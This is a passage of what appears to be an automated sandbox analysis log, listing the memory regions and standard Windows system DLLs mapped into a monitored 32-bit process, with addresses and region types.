"\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2136 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2137 start_va = 0x6c930000 end_va = 0x6c983fff monitored = 0 entry_point = 0x6c9610d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 2138 start_va = 0x70000000 end_va = 0x70020fff monitored = 0 entry_point = 0x7001a910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 2139 start_va = 0x5f0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2140 start_va = 0x6b0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2141 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2142 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2143 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2144 start_va = 0x1a0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x1a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2145 start_va = 0x4940000 end_va = 0x4ac7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 2146 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2147 start_va = 0x4ad0000 end_va = 0x4c50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 2148 start_va = 0x4c60000 end_va = 0x605ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 2149 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2150 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2151 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2152 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2153 start_va = 0x5f0000 end_va = 0x63efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 2154 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 2155 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2156 start_va = 0x6b0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2157 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2158 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2159 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2160 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2161 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2162 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2163 start_va = 0x6060000 end_va = 0x685ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006060000" filename = "" Region: id = 2164 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2165 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2166 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2167 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2168 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2169 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2170 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2171 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2172 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2173 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2174 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2175 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2176 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2177 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2178 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2179 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2180 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2181 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2182 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2183 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2184 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2185 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2186 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2187 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2188 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2189 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2190 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2191 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2192 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2193 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2194 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2195 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2196 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2197 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2198 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2199 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2200 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2201 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2202 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2203 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2204 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2205 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2206 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2207 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2208 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2209 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2210 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2211 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2212 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2213 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2214 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2215 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2216 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2217 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2218 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2219 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2220 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2221 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2222 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2223 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2224 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2225 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2226 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2227 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2228 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2229 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2230 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2231 start_va = 0x6f0000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2232 start_va = 0x4c0000 end_va = 0x4c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 2233 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2234 start_va = 0x6c510000 end_va = 0x6c92dfff monitored = 0 entry_point = 0x6c60ee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 2235 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2236 start_va = 0x6c310000 end_va = 0x6c37ffff monitored = 0 entry_point = 0x6c364b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 2237 start_va = 0x70040000 end_va = 0x7006cfff monitored = 0 entry_point = 0x70052b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 2238 start_va = 0x6060000 end_va = 0x6149fff monitored = 0 entry_point = 0x609d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2239 start_va = 0x6cc40000 end_va = 0x6cc49fff monitored = 0 entry_point = 0x6cc43200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2240 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2241 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2242 start_va = 0x6060000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 2243 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2244 start_va = 0x6160000 end_va = 0x6496fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2245 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2246 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2247 start_va = 0x4d0000 end_va = 0x4d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2248 start_va = 0x4d0000 end_va = 0x4d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2249 start_va = 0x64a0000 end_va = 0x659ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064a0000" filename = "" Region: id = 2250 start_va = 0x4d0000 end_va = 0x4d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2251 start_va = 0x4d0000 end_va = 0x4dbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2252 start_va = 0x4d0000 end_va = 0x4ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2253 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2254 start_va = 0x4d0000 end_va = 0x4e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2255 start_va = 0x4d0000 end_va = 0x4e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2256 start_va = 0x4d0000 end_va = 0x4e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2257 start_va = 0x4d0000 end_va = 0x4e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2258 start_va = 0x4d0000 end_va = 0x4e9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2259 start_va = 0x4d0000 end_va = 0x4ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2260 start_va = 0x4d0000 end_va = 0x4edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2261 start_va = 0x4d0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2262 start_va = 0x65a0000 end_va = 0x669ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 2263 start_va = 0x810000 end_va = 0x8effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2264 start_va = 0x66a0000 end_va = 0x676dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066a0000" filename = "" Region: id = 2265 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2266 start_va = 0x4e0000 end_va = 0x4e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 2267 start_va = 0x640000 end_va = 0x643fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2268 start_va = 0x66a0000 end_va = 0x6e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000066a0000" filename = "" Region: id = 2269 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2270 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2271 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2272 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2273 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2274 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2275 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2276 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2277 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2278 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2279 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2280 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2281 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2282 start_va = 0x66a0000 end_va = 0x679ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066a0000" filename = "" Region: id = 2283 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2284 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2285 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2286 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2287 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2288 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2289 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2290 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2291 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2292 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2293 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2294 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2295 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2296 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2297 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2298 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2299 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2300 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2301 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2302 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2303 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2304 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2305 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2306 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2307 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2308 start_va = 0x650000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 